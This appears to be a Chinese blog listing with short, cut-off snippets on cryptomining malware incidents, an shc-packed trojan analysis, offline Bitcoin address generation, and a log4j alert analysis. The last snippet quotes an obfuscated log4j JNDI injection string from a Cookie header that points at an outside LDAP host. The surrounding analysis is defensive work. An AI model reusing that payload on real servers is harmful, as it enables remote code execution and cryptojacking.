-
一个“挖矿脚本”还能难得住我?
公司有几台机器,最近 CPU 一直在疯转,就像是吃了药,一直在发热。由于机器实在是太多,有这么几台安全性防护没有到位,就一直躺在角落里疯狂运转。直到统一的监控脚本接管了这几台机器,异常情况才得以浮出水面。最后发现了多个奇奇怪怪的进程,发现是一个挖矿脚本。下载下来学习了一下,发现脚本的编写者,有着较高的水平。虽然在别人机器进行挖矿行为是不道德的,但掩盖不了脚本编写者的风骚操作。挖矿,是计算机技术界最
-
记一次挖矿木马样本分析
有一台vps被弱口令上马了翻来翻去找到个二进制文件如下前言搜main函数关键字可以判断是用shc加密shell脚本生成的二进制文件在0000000000400F7E位置函数,找到了加载shell命令的位置shc部分源码/* shc.c *//** * This software contains an ad hoc version of the 'Alleged RC4' algorithm, *
-
区块链开发:比特币入门之地址的离线生成与管理
一、概述在前面的课程中,我们使用节点软件的getnewaddress调用来创建 新的比特币地址,地址对应的私钥以及交易的签名都是由节点钱包模块 管理,应用程序是无法控制的,在某些应用场景中,这可能会限制 应用的功能实现。如果要获得最大程度的灵活性,我们就需要抛开节点软件,使用 C#代码来离线生成地址。这些离线生成的地址自然不属于节点钱包 管理,因此也会带来一些额外的问题,例如:需要我们理解密钥、地
-
setup_c3pool_minersh
今天告警巡逻,又抓到一个门罗币挖矿启动脚本,利用log4j漏洞,在HTTP请求的多个字段中进行注入,经过分析,是漏洞探测,没有攻击成功。简单分析如下,HTTP请求中Cookie 字段被设置为 t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//cdn.x4b.lol:3306/TomcatBypass/Command/B
- 1